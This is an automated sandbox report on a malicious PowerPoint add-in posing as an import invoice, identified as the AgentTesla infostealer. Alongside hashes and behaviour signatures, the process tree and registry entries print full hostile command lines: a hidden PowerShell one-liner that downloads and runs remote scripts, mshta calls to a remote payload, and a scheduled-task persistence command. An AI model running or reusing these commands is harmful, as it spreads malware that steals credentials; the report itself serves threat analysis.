Analysis
-
max time kernel
109s -
max time network
135s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
19-10-2021 08:22
Static task
static1
Behavioral task
behavioral1
Sample
Import Invoice Duty and Clearance.ppam
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
Import Invoice Duty and Clearance.ppam
Resource
win10-en-20210920
General
-
Target
Import Invoice Duty and Clearance.ppam
-
Size
8KB
-
MD5
7659d46dbf1d34e7833e4b0b2968f281
-
SHA1
05f65097aefb7a9c8269ef63d7aec4764079b970
-
SHA256
0cabc6544bb554fc6900c766ade30bee9bd403f64231e87b65fc9182128d7515
-
SHA512
db5f925cd241e429593c18148f9b9ded717ef87bf935a9d134579d1139c23292201803104910896ef4ecde4891735690b2826f82cefb6762d61763244e94e4ec
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3616 2180 mshta.exe POWERPNT.EXE -
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3628-325-0x000000000043755E-mapping.dmp family_agenttesla behavioral2/memory/1300-392-0x000000000043755E-mapping.dmp family_agenttesla behavioral2/memory/1300-398-0x0000000005160000-0x000000000565E000-memory.dmp family_agenttesla -
Blocklisted process makes network request 15 IoCs
Processes:
mshta.exepowershell.exeflow pid process 28 3616 mshta.exe 29 3616 mshta.exe 33 3616 mshta.exe 36 3616 mshta.exe 38 3616 mshta.exe 40 3616 mshta.exe 41 3616 mshta.exe 43 3616 mshta.exe 47 3616 mshta.exe 48 3616 mshta.exe 50 3616 mshta.exe 52 3616 mshta.exe 54 3616 mshta.exe 56 3396 powershell.exe 59 3616 mshta.exe -
Drops file in Drivers directory 2 IoCs
Processes:
jsc.exeRegAsm.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe File opened for modification C:\Windows\system32\drivers\etc\hosts RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
RegAsm.exejsc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
mshta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_8f22087a2c0740eba07c3aea05e107e7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_959babd593ed4cd49dd3b6a0f1146d59.txt').GetResponse().GetResponseStream()).ReadToend());" mshta.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/13.html\"" mshta.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 3396 set thread context of 3628 3396 powershell.exe jsc.exe PID 3396 set thread context of 1300 3396 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3188 taskkill.exe 3344 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 2180 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
dw20.exepowershell.exejsc.exeRegAsm.exepid process 2528 dw20.exe 2528 dw20.exe 3396 powershell.exe 3396 powershell.exe 3396 powershell.exe 3628 jsc.exe 3628 jsc.exe 1300 RegAsm.exe 1300 RegAsm.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
RegAsm.exepid process 1300 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 3188 taskkill.exe Token: SeDebugPrivilege 3344 taskkill.exe Token: SeDebugPrivilege 3396 powershell.exe Token: SeDebugPrivilege 3628 jsc.exe Token: SeDebugPrivilege 1300 RegAsm.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
POWERPNT.EXEpid process 2180 POWERPNT.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
POWERPNT.EXEjsc.exeRegAsm.exepid process 2180 POWERPNT.EXE 2180 POWERPNT.EXE 2180 POWERPNT.EXE 3628 jsc.exe 1300 RegAsm.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.execsc.exedescription pid process target process PID 2180 wrote to memory of 3616 2180 POWERPNT.EXE mshta.exe PID 2180 wrote to memory of 3616 2180 POWERPNT.EXE mshta.exe PID 3616 wrote to memory of 3188 3616 mshta.exe taskkill.exe PID 3616 wrote to memory of 3188 3616 mshta.exe taskkill.exe PID 3616 wrote to memory of 3344 3616 mshta.exe taskkill.exe PID 3616 wrote to memory of 3344 3616 mshta.exe taskkill.exe PID 3616 wrote to memory of 1420 3616 mshta.exe schtasks.exe PID 3616 wrote to memory of 1420 3616 mshta.exe schtasks.exe PID 3616 wrote to memory of 2528 3616 mshta.exe dw20.exe PID 3616 wrote to memory of 2528 3616 mshta.exe dw20.exe PID 3616 wrote to memory of 3396 3616 mshta.exe powershell.exe PID 3616 wrote to memory of 3396 3616 mshta.exe powershell.exe PID 3396 wrote to memory of 3628 3396 powershell.exe jsc.exe PID 3396 wrote to memory of 3628 3396 powershell.exe jsc.exe PID 3396 wrote to memory of 3628 3396 powershell.exe jsc.exe PID 3396 wrote to memory of 3628 3396 powershell.exe jsc.exe PID 3396 wrote to memory of 3628 3396 powershell.exe jsc.exe PID 3396 wrote to memory of 3628 3396 powershell.exe jsc.exe PID 3396 wrote to memory of 3628 3396 powershell.exe jsc.exe PID 3396 wrote to memory of 3628 3396 powershell.exe jsc.exe PID 3396 wrote to memory of 2012 3396 powershell.exe csc.exe PID 3396 wrote to memory of 2012 3396 powershell.exe csc.exe PID 2012 wrote to memory of 1864 2012 csc.exe cvtres.exe PID 2012 wrote to memory of 1864 2012 csc.exe cvtres.exe PID 3396 wrote to memory of 1300 3396 powershell.exe RegAsm.exe PID 3396 wrote to memory of 1300 3396 powershell.exe RegAsm.exe PID 3396 wrote to memory of 1300 3396 powershell.exe RegAsm.exe PID 3396 wrote to memory of 1300 3396 powershell.exe RegAsm.exe PID 3396 wrote to memory of 1300 3396 powershell.exe RegAsm.exe PID 3396 wrote to memory of 1300 3396 powershell.exe RegAsm.exe PID 3396 wrote to memory of 1300 3396 powershell.exe RegAsm.exe PID 3396 wrote to memory of 1300 3396 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Import Invoice Duty and Clearance.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdrufhjwijjd2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 29323⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_8f22087a2c0740eba07c3aea05e107e7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_959babd593ed4cd49dd3b6a0f1146d59.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES21BD.tmp" "c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\CSC8FAB9AA34374446FA246EFC3ABFA7A2C.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/13.html\""3⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.dllMD5
63bef306b2ee0a524554005e6dd9c1ce
SHA107e31a8422aa3e3d9358c26316e50a739e4e63ad
SHA256268febd32f59e672cccdba452784d588e9dab5eeaae82f38890974087cd6985c
SHA512d5aad6a7f8d32d0e0299b28e8626ff8b1fbdd15f98ef41f33f47c0210980fbef1569fd2241de10604750555affd9effa04e7bf501e2e85631fbb3a2f60abdd20
-
C:\Users\Admin\AppData\Local\Temp\RES21BD.tmpMD5
bd4bbfa1cc7bbe74305dd660f55744b0
SHA18792b2a7825663bb56956573d73b273c088f70a5
SHA256d504063bd7f6bb1eaf1af24c81be2f15da8cc86086f4c271de774079bd315baa
SHA512062694d2cc8efe0237f96e311e73a60da76ce8ee05e25030560fe9377cade3093829e8b910bb60bb8ff61fbe4c87db74d1eb159933d653a7347b67f6ad119ec0
-
C:\Windows\system32\drivers\etc\hostsMD5
5b2d17233558878a82ee464d04f58b59
SHA147ebffcad0b4c358df0d6a06ef335cb6aab0ab20
SHA2565b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542
SHA512d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b
-
\??\c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.0.csMD5
e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
\??\c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\4qcyrxrj.cmdlineMD5
459c97f179f9c12282a27b7cc0dab67f
SHA1799b332b28ff23a9ed14a2e69d3ae3c695979760
SHA256f2cabcecc16fb57fcb635dfbc240a03af5074d1cbd8c2ac43bd32847493c277f
SHA512698af230c41335009eda7993d26e0d6aefb1a3ed8f5e2e4b96847cb831a502817b42d8381821691e930e60dd320fc00050ef13283446eb90c8e0671d5a52866f
-
\??\c:\Users\Admin\AppData\Local\Temp\4qcyrxrj\CSC8FAB9AA34374446FA246EFC3ABFA7A2C.TMPMD5
519d23770cc733c630736c259f5be250
SHA18349bbfff0f12cb4251864246ecb29749acab772
SHA256f4e91e4bfd403ce5b8c3ad60c942f54ad82e5546ed8cd228b16f8822553ad9b7
SHA5128890c88f1918ed59310b417a6ae38015baefd7d22f2b13a8278b3f99acbf75dce96ecc466af01cc22ef656a6d8d9837be878db5cb298c8519978ed0f12a6e499
-
memory/1300-409-0x0000000005160000-0x000000000565E000-memory.dmpFilesize
5.0MB
-
memory/1300-398-0x0000000005160000-0x000000000565E000-memory.dmpFilesize
5.0MB
-
memory/1300-392-0x000000000043755E-mapping.dmp
-
memory/1420-296-0x0000000000000000-mapping.dmp
-
memory/1864-386-0x0000000000000000-mapping.dmp
-
memory/2012-383-0x0000000000000000-mapping.dmp
-
memory/2180-128-0x00007FF91FDB0000-0x00007FF91FDC0000-memory.dmpFilesize
64KB
-
memory/2180-120-0x00000272894C0000-0x00000272894C2000-memory.dmpFilesize
8KB
-
memory/2180-116-0x00007FF923170000-0x00007FF923180000-memory.dmpFilesize
64KB
-
memory/2180-117-0x00007FF923170000-0x00007FF923180000-memory.dmpFilesize
64KB
-
memory/2180-118-0x00007FF923170000-0x00007FF923180000-memory.dmpFilesize
64KB
-
memory/2180-119-0x00007FF923170000-0x00007FF923180000-memory.dmpFilesize
64KB
-
memory/2180-121-0x00000272894C0000-0x00000272894C2000-memory.dmpFilesize
8KB
-
memory/2180-122-0x00000272894C0000-0x00000272894C2000-memory.dmpFilesize
8KB
-
memory/2180-115-0x00007FF923170000-0x00007FF923180000-memory.dmpFilesize
64KB
-
memory/2180-129-0x00007FF91FDB0000-0x00007FF91FDC0000-memory.dmpFilesize
64KB
-
memory/2180-257-0x0000027296E40000-0x0000027296E44000-memory.dmpFilesize
16KB
-
memory/2528-297-0x0000000000000000-mapping.dmp
-
memory/3188-294-0x0000000000000000-mapping.dmp
-
memory/3344-295-0x0000000000000000-mapping.dmp
-
memory/3396-317-0x00000212A40F6000-0x00000212A40F8000-memory.dmpFilesize
8KB
-
memory/3396-312-0x00000212A40F3000-0x00000212A40F5000-memory.dmpFilesize
8KB
-
memory/3396-311-0x00000212A40F0000-0x00000212A40F2000-memory.dmpFilesize
8KB
-
memory/3396-298-0x0000000000000000-mapping.dmp
-
memory/3616-263-0x0000000000000000-mapping.dmp
-
memory/3628-382-0x0000000004DF0000-0x00000000052EE000-memory.dmpFilesize
5.0MB
-
memory/3628-325-0x000000000043755E-mapping.dmp
-
memory/3628-408-0x0000000004DF0000-0x00000000052EE000-memory.dmpFilesize
5.0MB